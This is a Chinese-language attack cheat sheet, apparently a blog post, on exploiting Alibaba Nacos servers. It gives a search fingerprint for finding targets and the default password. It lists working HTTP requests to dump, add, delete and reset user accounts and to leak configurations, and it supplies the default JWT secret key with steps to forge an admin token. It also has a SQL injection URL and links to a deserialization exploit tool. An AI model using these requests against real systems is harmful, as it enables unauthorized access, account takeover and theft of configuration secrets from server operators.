Alibaba Nacos是阿里巴巴推出來的一個新開源項目,是一個更易于構建云原生應用的動態服務發現、配置管理和服務管理平臺。致力于幫助發現、配置和管理微服務。Nacos提供了一組簡單易用的特性集,可以快速實現動態服務發現、服務配置、服務元數據及流量管理。
指紋:app="nacos"
默認密碼nacos/nacos
漏洞1-獲取已有的用戶列表的賬號和密碼
在路徑后面加上/nacos/v1/auth/users?pageNo=1&pageSize=9
可以獲取到已有的用戶名和密碼,可以把User-Agent頭改為Nacos-Server,如圖
漏洞2-任意用戶添加
更改提交方式為POST
?, 訪問/nacos/v1/auth/users?username=test111&password=123456
新建一個賬號test111,可以看到創建用戶成功,如圖
漏洞3-任意用戶刪除
更改提交方式為DELETE
?, 訪問DELETE /nacos/v1/auth/users?username=test111
可以看到用戶刪除成功,如圖
漏洞4-用戶密碼重置
更改提交方式為PUT,
訪問?/nacos/v1/auth/users?accessToken=&username=test1&newPassword=test222
漏洞5-配置信息泄露
在路徑后面加上:/n
acos/v1/cs/configs?search=accurate&dataId=&group=&pageNo=1&pageSize=99
漏洞6-token.secret.key默認配置(QVD-2023-6271)
Nacos使用token.secret.key來進行身份認證和加密。在Nacos版本 <= 2.2.0 時,這個密鑰是固定的默認值,導致存在一個安全漏洞。攻擊者可以利用這個默認密鑰構造JWT,繞過身份認證并進入Nacos后臺,從而對系統進行控制。
這個漏洞個人認為是最常見的一個,有一半以上的nacos系統都存在這個洞。
SecretKey012345678901234567890123456789012345678901234567890123456789
填入密鑰,填入新的時間戳,勾選secret base64 encoded,獲取新的token
然后在登錄請求中,攔截數據包,添加Authorization信息,攔截放回包后放包
Authorization: Bearer 你的token
漏洞7-Nacos Derby SQL注入漏洞 ?(CNVD-2020-67618)
/nacos/v1/cs/ops/derby?sql=%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%75%73%65%72%73
這是一個注入點
漏洞8-Nacos 集群 Raft?Hessian 反序列化漏洞 反序列化漏洞 (CNVD-2023-45001)
Nacos 1.4.1+在單機模式下默認不開放7848端口,故該情況通常不受此漏洞影響。然而,1.4.0、2.x版本無論單機或集群模式均默認開放7848端口。
所以最終影響范圍是:
1.4.0 <= Nacos < 1.4.6 使用cluster集群模式運行
2.0.0 <= Nacos < 2.2.3 任意模式啟動均受到影響
https://github.com/charonlight/NacosExploitGUI
漏洞9-Nacos-Client Yaml反序列化
利用:
https://github.com/charonlight/NacosExploitGUI
參考
https://mp.weixin.qq.com/s?__biz=MzkyOTMxNDM3Ng==&mid=2247488470&idx=1&sn=3cf9f8d4d3fd8348e5892153d565b395&chksm=c36f650de5053aab2024fb0fc12322396c554fb03fc8c17adbe4194145c1a89e4b9f51fd62b8&scene=126&sessionid=1713370439&key=58349ff90672df9829e6924cfc57517ee7e58625f070922c45f5af210801e70276eb4a689056fd0960d8dc5f403cbee7615e8a8e7f5f703ce00d812f7fac6d4db56642cfcb63adbe7418c3eec5e10b064bd28f7016ec971ed7a03ca6567bcd1e7fd1c5203e377389a2ec1d468bf1ac8e33296f54599ad5751ad29fde037be74f&ascene=15&uin=NTY2NTA4NjQ%3D&devicetype=Windows+10+x64&version=63060012&lang=zh_CN&session_us=gh_26cb3abead85&countrycode=AL&exportkey=n_ChQIAhIQgo%2F0zroKlgleqOV2m0JGURLuAQIE97dBBAEAAAAAANkSNcr3NjcAAAAOpnltbLcz9gKNyK89dVj0%2FT3gG0eYVXjNiToxQo5St79l90A%2BfC9aAki5MgpTumq85GqFI5kijd7yu6Tf1%2F2qBLw4v%2FP5LOaG5iMpZGxGKqJ%2Fu3mSwaimgTVd4tBdAvjxp%2FY8pG7lbYuJ8UqhIPNtD488y8Gl53tMsWzuYB1OdJTPqLzKp0LWxZJuclBE%2FB%2BLrh%2FSWtb3tNRETI5ZhK%2FoQ07KxieCca61IJ03ukMZc7Z0Hyr%2B%2FTcbX5Pf4cu7yHI4pZib9UUekQhMblWsn1EQPuFQYCZr7T0%3D&acctmode=0&pass_ticket=eq8HCji1DfXBOtEbPkSsc2TsXg7z3fUce6vSp7oYpIevjMHBe69CXIaB5taxqR93LsA4cuKuMt3CimuizC5UFg%3D%3D&wx_header=0&fontgear=2&poc_token=HKl_gWajBUI7atk2qu8rrVhwt5Ia6zTmApeYG7JX
https://www.freebuf.com/articles/web/384857.html
https://www.cnblogs.com/thebeastofwar/p/17920565.html